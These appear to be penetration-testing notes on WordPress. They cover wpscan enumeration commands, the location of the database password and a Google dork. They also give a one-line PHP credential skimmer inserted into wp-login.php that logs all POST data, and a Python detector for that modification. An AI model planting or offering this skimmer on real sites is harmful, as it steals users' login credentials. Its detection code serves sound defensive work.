WordPress
WPscan:
wpscan -u 10.10.10.10/wp/
wpscan --url http://10.10.10.10 --detection-mode aggressive -t 20 -e u,ap,tt,vt
Interesting features:
Enumerate directories, users
Password attacks
Scan for vulns in core, plugins, themes
WordPress files:
wp-config.php: contains the database password
WP Credential Skimming:
This attack needs backdoor access. In htdocs, edit the wp-login.php file with a new line added to the start of the file: <?php file_put_contents('log.txt', file_get_contents('php://input'));?>

This will capture all incoming POSTs and save them into a text file in the htdocs folder. We would then see the captured input in the file when people log in or perform other interesting POST activity.
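From the defender's side, the modification described above can be found by searching PHP files for statements that write raw request input to disk. The following is an added example, not part of the original notes; the regex heuristic, the function names and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic assumed for this example: a file-write call whose arguments,
# up to the closing ';', contain raw request input. Not a complete signature.
WRITE_OF_REQUEST = re.compile(
    r"\b(file_put_contents|fwrite|fputs)\s*\("
    r"[^;]*?(php://input|\$_POST|\$_REQUEST|\$HTTP_RAW_POST_DATA)[^;]*;?",
    re.IGNORECASE,
)

def scan_file(path):
    """Return (line_number, statement) for each write of request data to disk."""
    text = Path(path).read_text(errors="replace")
    findings = []
    for m in WRITE_OF_REQUEST.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        findings.append((line, " ".join(m.group(0).split())))
    return findings

def scan_tree(root):
    """Scan every .php file under root; map relative path -> findings."""
    root = Path(root)
    hits = {}
    for php in sorted(root.rglob("*.php")):
        found = scan_file(php)
        if found:
            hits[str(php.relative_to(root))] = found
    return hits

def build_sample(root):
    """Constructed sample tree: one tampered wp-login.php, one clean file."""
    root = Path(root)
    (root / "wp-login.php").write_text(
        "<?php file_put_contents('log.txt', file_get_contents('php://input'));?>\n"
        "<?php\nrequire __DIR__ . '/wp-load.php';\n"
    )
    (root / "index.php").write_text(
        "<?php\n$name = isset($_POST['name']) ? $_POST['name'] : '';\n"
        "echo htmlspecialchars($name);\n"
    )

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, found in scan_tree(tmp).items():
            print(path, found)
```

Because wp-login.php is a core file, comparing it against the official checksums (for example with WP-CLI's `wp core verify-checksums`) would also surface this modification.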
Google dork for vulnerable versions. Example: "error_log" inurl:/wp-content
Look for vulnerable plugins:


